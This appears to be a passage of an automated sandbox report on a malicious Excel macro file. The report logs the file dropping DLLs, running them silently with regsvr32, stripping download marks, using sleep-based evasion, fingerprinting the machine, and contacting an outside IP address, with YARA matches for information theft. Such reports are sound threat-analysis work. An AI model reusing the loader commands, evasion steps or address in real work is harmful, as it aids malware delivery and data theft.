Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet5.xml
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet6.xml
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/media/image1.jpg
Source: qd_34768.xlsm Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001B2B0 push eax; ret 3_2_1001B2DE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001A9E0 push eax; ret 3_2_1001A9FE
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_100657FF
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe -s ..\xewn.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to dropped file

Boot Survival

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\xewn.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\regsvr32.exe File opened: C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File opened: C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002B150 CallWindowProcA,DefWindowProcA,IsIconic,SendMessageA,GetWindowLongA,GetWindowLongA,GetWindowDC,GetWindowRect,InflateRect,InflateRect,SelectObject,OffsetRect,SelectObject,ReleaseDC, 3_2_1002B150
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1002B900 GetPropA,CallWindowProcA,CallWindowProcA,IsIconic,CallWindowProcA,GetWindowLongA,SendMessageA,CallWindowProcA,CallWindowProcA,GetWindowLongA,GetClassNameA,lstrcmpA,CallWindowProcA,GetWindowLongA,CallWindowProcA,CallWindowProcA,CallWindowProcA, 3_2_1002B900
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000EA9B IsIconic,GetWindowPlacement,GetWindowRect, 3_2_1000EA9B
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_100657FF
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1916 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2264 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2916 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\eVzUZ7dv5zBAXa5[1].dll Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 3.1 %
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100492F7 FindFirstFileA,FindClose, 3_2_100492F7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100489BD __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 3_2_100489BD
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_004168D2 FindFirstFileW, 5_2_004168D2
Source: C:\Windows\SysWOW64\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: regsvr32.exe, 00000004.00000002.470572841.00000000003C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 3_2_100657FF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_100011EF ??3@YAXPAX@Z,??3@YAXPAX@Z,GetProcessHeap,HeapFree, 3_2_100011EF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10021DEA SetUnhandledExceptionFilter, 3_2_10021DEA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10021DFC SetUnhandledExceptionFilter, 3_2_10021DFC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 68.183.94.239 80 Jump to behavior
Source: Yara match File source: app.xml, type: SAMPLE
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd" Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn" Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte, 3_2_1002904C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 3_2_1002910F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale, 3_2_10026143
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesA, 3_2_10026318
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesA, 3_2_100265A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: EnumSystemLocalesA, 3_2_100266B6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA, 3_2_100268AA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 3_2_10028F39
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 3_2_10028FF6
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001CE60 GetLocalTime,GetSystemTime,GetTimeZoneInformation, 3_2_1001CE60
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10023F2F GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 3_2_10023F2F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10064D73 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA, 3_2_10064D73

Stealing of Sensitive Information

Source: Yara match File source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY